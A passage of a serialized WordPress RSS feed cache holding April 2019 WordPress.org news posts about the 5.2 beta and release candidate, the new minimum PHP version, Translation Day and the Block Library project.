build process has been enhanced</a>.</p>\n\n\n\n<p><a href="https://wordpress.org/news/2019/04/wordpress-5-2-release-candidate/">WordPress 5.2 is now in the Release Candidate phase</a> and you can test it by installing <a href="https://wordpress.org/plugins/wordpress-beta-tester/">the Beta Tester plugin</a> on any WordPress site.</p>\n\n\n\n<p>Want to get involved in building WordPress Core? Follow <a href="https://make.wordpress.org/core">the Core team blog</a> and join the #core channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>WordPress Translation Day 4 is Almost Here</h2>\n\n\n\n<p>On 11 May 2019, <a href="https://make.wordpress.org/polyglots/2019/03/01/global-wordpress-translation-day-4-is-coming/">the fourth WordPress Translation Day</a> will take place. This is a 24-hour global event dedicated to the translation of all things WordPress, from Core to themes, plugins to marketing.</p>\n\n\n\n<p>Over the course of 24 hours, WordPress communities will meet to translate WordPress into their local languages and watch talks and sessions broadcast on <a href="https://wptranslationday.org/">wptranslationday.org</a>. During the previous WordPress Translation Day, 71 local events took place in 29 countries, and even more communities are expected to take part this time.</p>\n\n\n\n<p>Want to get involved in WordPress Translation Day 4? Find out <a href="https://make.wordpress.org/community/2019/03/22/global-wordpress-translation-day-4-info-for-event-organizers/">how to organize a local event</a>, follow the updates on <a href="https://make.wordpress.org/polyglots/tag/gwtd4/">the Polyglots team blog</a>, and join the #polyglots channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Block Library Project Gets Started</h2>\n\n\n\n<p>Since <a href="https://make.wordpress.org/meta/2019/03/08/the-block-directory-and-a-new-type-of-plugin/">the initial proposal</a> for a Block Library that would be made available from inside the block editor, work has been done to put together <a href="https://make.wordpress.org/design/2019/04/02/call-for-design-installing-blocks-from-within-gutenberg/">some designs</a> for how this would look. Since then the project has received a more direct focus with <a href="https://make.wordpress.org/design/2019/04/26/block-library-installing-blocks-from-within-gutenberg/">a planned out scope and timeline</a>.</p>\n\n\n\n<p>The project is being managed <a href="https://github.com/WordPress/block-directory/projects/1">on GitHub</a> and people interested in contributing are encouraged to get involved there. You can also keep up to date by following <a href="https://make.wordpress.org/design/">the Design team blog</a> and joining the #design channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>Further Reading:</h2>\n\n\n\n<ul><li>The results from the 5.0 release retrospective survey <a href="https://make.wordpress.org/updates/2019/04/26/5-0-release-retrospective-wrap-up/">have been published</a> &#8211; this is the first time this kind of open retrospective has been done for a WordPress release and the results provide valuable insight into the project and its contributors.</li><li>The team behind the WordPress Coding Standards <a href="https://github.com/WordPress-Coding-Standards/WordPress-Coding-Standards/releases/tag/2.1.0">has released version 2.1</a>, including some very useful new sniffs.</li><li>The community <a href="https://make.wordpress.org/community/2019/04/18/the-get-involved-table-at-wceu-2019/">is looking for volunteers for the Get Involved table</a> at WordCamp Europe on 20-22 June.</li><li>Gutenberg has been ported <a href="https://github.com/VanOns/laraberg/">for use within the Laravel framework</a> in a project dubbed Laraberg.</li><li>The 2019 WordCamp for Publishers event <a href="https://2019-columbus.publishers.wordcamp.org/2019/04/12/call-for-speakers/">has opened its call for speakers</a>.</li><li>The Gutenberg team <a href="https://github.com/WordPress/gutenberg/blob/add/blocks-in-widget-areas-rfc/docs/rfcs/blocks-in-widget-areas.md">has published an RFC</a> regarding blocks being used in widgets.</li><li>WordCamp Europe, taking place on 20-22 June, has published <a href="https://2019.europe.wordcamp.org/schedule/">the schedule for the event</a>.</li><li>The Community Team <a href="https://make.wordpress.org/community/2019/04/18/2018-meetup-survey/">has published the results</a> of the 2018 meetup group survey.</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href="https://make.wordpress.org/community/month-in-wordpress-submissions/"><em>submit it here</em></a><em>.</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6918";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:31:"WordPress 5.2 Release Candidate";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:67:"https://wordpress.org/news/2019/04/wordpress-5-2-release-candidate/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 26 Apr 2019 01:28:10 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:11:"Development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6909";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:364:"The first release candidate for WordPress 5.2 is now available! This is an important milestone as we progress toward the WordPress 5.2 release date. “Release Candidate” means that the new version is ready for release, but with millions of users and thousands of plugins and themes, it’s possible something was missed. WordPress 5.2 is scheduled to [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:7:"Josepha";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3117:"\n<p>The first release candidate for WordPress 5.2 is now available!</p>\n\n\n\n<p>This is an important milestone as we progress toward the WordPress 5.2 release date. “Release Candidate” means that the new version is ready for release, but with millions of users and thousands of plugins and themes, it’s possible something was missed. WordPress 5.2 is scheduled to be released on <strong>Tuesday, May 7</strong>, but we need <em>your</em> help to get there—if you haven’t tried 5.2 yet, now is the time!</p>\n\n\n\n<p>There are two ways to test the WordPress 5.2 release candidate: try the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin (you’ll want to select the “bleeding edge nightlies” option), or you can <a href="https://wordpress.org/wordpress-5.2-RC1.zip">download the release candidate here</a> (zip).</p>\n\n\n\n<h2>What&#8217;s in WordPress 5.2?</h2>\n\n\n\n<p>Continuing with the theme from the last release, WordPress 5.2 gives you even more robust tools for identifying and fixing configuration issues and fatal errors. Whether you are a developer helping clients or you manage your site solo, these tools can help get you the right information when you need it.</p>\n\n\n\n<p>The Site Health Check and PHP Error Protection tools have brand new features, giving you peace of mind if you discover any issues with plugins or themes on your site. There are also updates to the icons available in your dashboard, fresh accessibility considerations for anyone using assistive technologies and more.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.2 and update the <em>Tested up to</em> version in the readme to 5.2. If you find compatibility problems, please be sure to post to the <a href="https://wordpress.org/support/forum/alphabeta/">support forums</a> so we can figure those out before the final release.</p>\n\n\n\n<p>The <a href="https://make.wordpress.org/core/2019/04/16/wordpress-5-2-field-guide/">WordPress 5.2 Field Guide</a> has also been published, which goes into the details of the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a> This release also marks the <a href="https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze">hard string freeze</a> point of the 5.2 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the&nbsp;<a href="https://wordpress.org/support/forum/alphabeta">Alpha/Beta area</a>&nbsp;in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report,&nbsp;<a href="https://make.wordpress.org/core/reports/">file one on WordPress Trac</a>, where you can also find&nbsp;<a href="https://core.trac.wordpress.org/tickets/major">a list of known bugs</a>.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<p><em>Howdy, RC 1!<br>With tools this interesting,<br>I can hardly wait.</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6909";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:20:"WordPress 5.2 Beta 3";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:56:"https://wordpress.org/news/2019/04/wordpress-5-2-beta-3/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 12 Apr 2019 21:33:07 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:11:"Development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6885";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:316:"WordPress 5.2 Beta 3 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site to play with the new version. There are two ways to test the latest WordPress 5.2 beta: try the WordPress Beta Tester plugin (you’ll want [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:19:"Jonathan Desrosiers";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4391:"\n<p>WordPress 5.2 Beta 3 is now available!</p>\n\n\n\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p>There are two ways to test the latest WordPress 5.2 beta: try the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin (you’ll want to select the “bleeding edge nightlies” option), or you can <a href="https://wordpress.org/wordpress-5.2-beta3.zip">download the beta here</a> (zip).</p>\n\n\n\n<p>WordPress 5.2 is slated for release on <a href="https://make.wordpress.org/core/5-2/">April 30</a>, and we need your help to get there! Thanks to the testing and feedback from everyone who tried <a href="https://wordpress.org/news/2019/04/wordpress-5-2-beta-2/">beta 2</a>, nearly <a href="https://core.trac.wordpress.org/query?status=closed&amp;changetime=04%2F09%2F2019..04%2F13%2F2019&amp;milestone=5.2&amp;group=component&amp;col=id&amp;col=summary&amp;col=status&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=priority">40 tickets have been closed</a> since then. Here are the major changes and bug fixes:</p>\n\n\n\n<ul><li>The new Site Health feature has continued to be refined.</li><li>Plugins no longer update if a site is running an unsupported version of PHP (see #46613).</li><li>It’s now more apparent when a site is running in Recovery Mode (see #46608).</li><li>The distraction free button no longer breaks keyboard navigation in the Classic Editor (see #46640).</li><li>Assistive technologies do a better job of announcing admin bar sub menus (see #37513).</li><li>Subject lines in WordPress emails are now more consistent (see #37940).</li><li>Personal data exports now only show as completed when a user downloads their data (see #44644).</li><li>Plus more improvements to accessibility (see #35497 and #42853).</li></ul>\n\n\n\n<h2>Minimum PHP Version Update</h2>\n\n\n\n<p><strong>Important reminder: </strong>as of WordPress 5.2 beta 2, the minimum PHP version that WordPress will require is 5.6.20. If you&#8217;re running an older version of PHP, we highly recommend updating it now, before WordPress 5.2 is officially released.</p>\n\n\n\n<figure class="wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-wordpress-news"><div class="wp-block-embed__wrapper">\n<blockquote class="wp-embedded-content" data-secret="rEVkMIfjDq"><a href="https://wordpress.org/news/2019/04/minimum-php-version-update/">Minimum PHP Version update</a></blockquote><iframe title="&#8220;Minimum PHP Version update&#8221; &#8212; WordPress News" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://wordpress.org/news/2019/04/minimum-php-version-update/embed/#?secret=rEVkMIfjDq" data-secret="rEVkMIfjDq" width="600" height="338" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>\n</div></figure>\n\n\n\n<h2>Developer Notes</h2>\n\n\n\n<p>WordPress 5.2 has lots of refinements to polish the developer experience. To keep up, subscribe to the <a href="https://make.wordpress.org/core/">Make WordPress Core blog</a> and pay special attention to the <a href="https://make.wordpress.org/core/tag/5-2+dev-notes/">developers notes</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a> The beta 3 release also marks the <a href="https://make.wordpress.org/polyglots/handbook/glossary/#soft-freeze">soft string freeze</a> point of the 5.2 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the <a href="https://wordpress.org/support/forum/alphabeta">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href="https://make.wordpress.org/core/reports/">file one on WordPress Trac</a>, where you can also find <a href="https://core.trac.wordpress.org/tickets/major">a list of known bugs</a>.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<p><em>Would you look at that<br>each day brings release closer<br>test to be ready</em>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6885";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:54:"\n		\n		\n				\n		\n				\n		\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:20:"WordPress 5.2 Beta 2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:56:"https://wordpress.org/news/2019/04/wordpress-5-2-beta-2/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 09 Apr 2019 01:27:44 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:3:{i:0;a:5:{s:4:"data";s:11:"Development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:3:"5.2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6874";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:312:"WordPress 5.2 Beta 2 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site to play with the new version. There are two ways to test the WordPress 5.2 beta: try the WordPress Beta Tester plugin (you’ll want to [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Gary Pendergast";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4565:"\n<p>WordPress 5.2 Beta 2 is now available!</p>\n\n\n\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p>There are two ways to test the WordPress 5.2 beta: try the <a href="https://wordpress.org/plugins/wordpress-beta-tester/">WordPress Beta Tester</a> plugin (you’ll want to select the “bleeding edge nightlies” option), or you can <a href="https://wordpress.org/wordpress-5.2-beta2.zip">download the beta here</a> (zip).</p>\n\n\n\n<p>WordPress 5.2 is slated for release on <a href="https://make.wordpress.org/core/5-2/">April 30</a>, and we need your help to get there! Thanks to the testing and feedback from everyone who tried <a href="https://wordpress.org/news/2019/03/wordpress-5-2-beta-1/">beta 1</a>, nearly <a href="https://core.trac.wordpress.org/query?status=closed&amp;changetime=2019-03-28..&amp;milestone=5.2&amp;group=component&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority">100 tickets have been closed</a> since then. Here are the major changes and bug fixes:</p>\n\n\n\n<ul><li>We&#8217;ve added support for Emoji 12! <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1fa82.png" alt="🪂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></li><li>A brand-new <code>wp_body_open()</code> template tag (and corresponding <code>wp_body_open</code> action) will let themes (and plugins!) add content right after the <code>&lt;body&gt;</code> is opened (<a href="https://core.trac.wordpress.org/ticket/12563">#12563</a>).</li><li>Superfluous paragraph tags will no longer incorrectly appear in dynamic block content (<a href="https://core.trac.wordpress.org/ticket/45495">#45495</a>).</li><li>The Site Health screens have received several bug fixes, tweaks, and performance improvements.</li><li>Crash Protection no longer interrupts plugin editing (<a href="https://core.trac.wordpress.org/ticket/46045">#46045</a>).</li><li>Custom error handlers now load correctly (<a href="https://core.trac.wordpress.org/ticket/46069">#46069</a>).</li></ul>\n\n\n\n<h2>Minimum PHP Version Update</h2>\n\n\n\n<p>As of WordPress 5.2 beta 2, the minimum PHP version that WordPress will require is 5.6.20. If you&#8217;re running an older version of PHP, we highly recommend updating it now, before WordPress 5.2 is officially released.</p>\n\n\n\n<figure class="wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-wordpress-news"><div class="wp-block-embed__wrapper">\n<blockquote class="wp-embedded-content" data-secret="C4d8QxYmh3"><a href="https://wordpress.org/news/2019/04/minimum-php-version-update/">Minimum PHP Version update</a></blockquote><iframe title="&#8220;Minimum PHP Version update&#8221; &#8212; WordPress News" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://wordpress.org/news/2019/04/minimum-php-version-update/embed/#?secret=C4d8QxYmh3" data-secret="C4d8QxYmh3" width="600" height="338" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>\n</div></figure>\n\n\n\n<h2>Developer Notes</h2>\n\n\n\n<p>WordPress 5.2 has lots of refinements to polish the developer experience. To keep up, subscribe to the <a href="https://make.wordpress.org/core/">Make WordPress Core blog</a> and pay special attention to the <a href="https://make.wordpress.org/core/tag/5-2+dev-notes/">developers notes</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English? <a href="https://translate.wordpress.org/projects/wp/dev">Help us translate WordPress into more than 100 languages!</a> </p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the <a href="https://wordpress.org/support/forum/alphabeta">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href="https://make.wordpress.org/core/reports/">file one on WordPress Trac</a>, where you can also find <a href="https://core.trac.wordpress.org/tickets/major">a list of known bugs</a>.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<p><em>The wonderful thing<br> about betas, is betas<br> are wonderful things.</em> <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f42f.png" alt="🐯" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6874";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:26:"Minimum PHP Version update";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:62:"https://wordpress.org/news/2019/04/minimum-php-version-update/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 01 Apr 2019 14:51:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:11:"Development";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:3:"PHP";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6810";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:330:"WordPress 5.2 is targeted for release at the end of this month, and with it comes an update to the minimum required version of PHP. WordPress will now require a minimum of PHP 5.6.20. Beginning in WordPress 5.1, users running PHP versions below 5.6 have had a notification in their dashboard that includes information to [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Aaron Jorbin";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3851:"\n<p>WordPress 5.2 is targeted for release at the end of this month, and with it comes an update to the minimum required version of PHP.  WordPress will now require a minimum of PHP 5.6.20.</p>\n\n\n\n<p>Beginning in WordPress 5.1, users running PHP versions below 5.6 have had a notification in their dashboard that includes <a href="https://wordpress.org/support/update-php/">information to help them update PHP</a>. Since then, the <a href="https://wordpress.org/about/stats/">WordPress stats</a> have shown an increase in users on more recent versions of PHP. </p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<figure class="wp-block-image"><img src="https://i2.wp.com/wordpress.org/news/files/2019/03/Screen-Shot-2019-03-27-at-10.30.34-PM.png?resize=632%2C265&#038;ssl=1" alt="Screenshot of the &quot;PHP Update Required&quot; widget from the WordPress dashboard. Contains information about detecting an insecure version of PHP, how it affects your site, and a link for information on upgrading." class="wp-image-6826" srcset="https://i2.wp.com/wordpress.org/news/files/2019/03/Screen-Shot-2019-03-27-at-10.30.34-PM.png?resize=1024%2C429&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2019/03/Screen-Shot-2019-03-27-at-10.30.34-PM.png?resize=300%2C126&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2019/03/Screen-Shot-2019-03-27-at-10.30.34-PM.png?resize=768%2C322&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2019/03/Screen-Shot-2019-03-27-at-10.30.34-PM.png?w=1046&amp;ssl=1 1046w" sizes="(max-width: 632px) 100vw, 632px" data-recalc-dims="1" /><figcaption>The dashboard widget users see if running an outdated version of PHP </figcaption></figure>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>Why You Should Update PHP</h2>\n\n\n\n<p>If your site is running on an unsupported version of PHP, the WordPress updater will not offer WordPress 5.2 to your site. If you attempt to update WordPress manually, that update will fail. To continue using the latest features of WordPress you must update to a newer version of PHP. </p>\n\n\n\n<p>When updating to a new version of PHP, WordPress encourages updating to its recommended version, PHP 7.3. The PHP internals team has done a great job making its most recent version the fastest version of PHP yet. This means that updating will improve the speed of your site, both for you and your visitors.</p>\n\n\n\n<p>This performance increase also means fewer servers are needed to host websites. Updating PHP isn&#8217;t just good for your site, it also means less energy is needed for the <a href="https://wordpress.org/news/2019/03/one-third-of-the-web/">1-in-3 sites that use WordPress</a>, so it&#8217;s good for the planet.  </p>\n\n\n\n<h2>How to Update PHP</h2>\n\n\n\n<p>If you need help updating to a new version of PHP, <a href="https://wordpress.org/support/update-php/">detailed documentation is available</a>.  This includes sample communication to send to your host for them to assist you. Many hosting companies have published information on how to <a href="https://github.com/WordPress/servehappy-resources/blob/master/tutorials/hosting-specific/tutorials-en.md">update PHP</a> that is specific for them. </p>\n\n\n\n<h2>5.6 now, but soon 7+</h2>\n\n\n\n<p>This is the first increase in PHP required version for WordPress since <a href="https://wordpress.org/news/2010/07/eol-for-php4-and-mysql4/">2010</a>, but may not be the only increase in 2019. The WordPress core team will monitor the adoption of the most recent versions of PHP with an eye towards making PHP 7+ the minimum version towards the end of the year. </p>\n\n\n\n<figure class="wp-block-pullquote"><blockquote><p><a href="https://wordpress.org/support/update-php/#how-to-update-your-websites-php-version-for-a-faster-more-secure-website">Update PHP today, so you can update WordPress tomorrow!</a></p></blockquote></figure>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6810";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:48:"\n		\n		\n		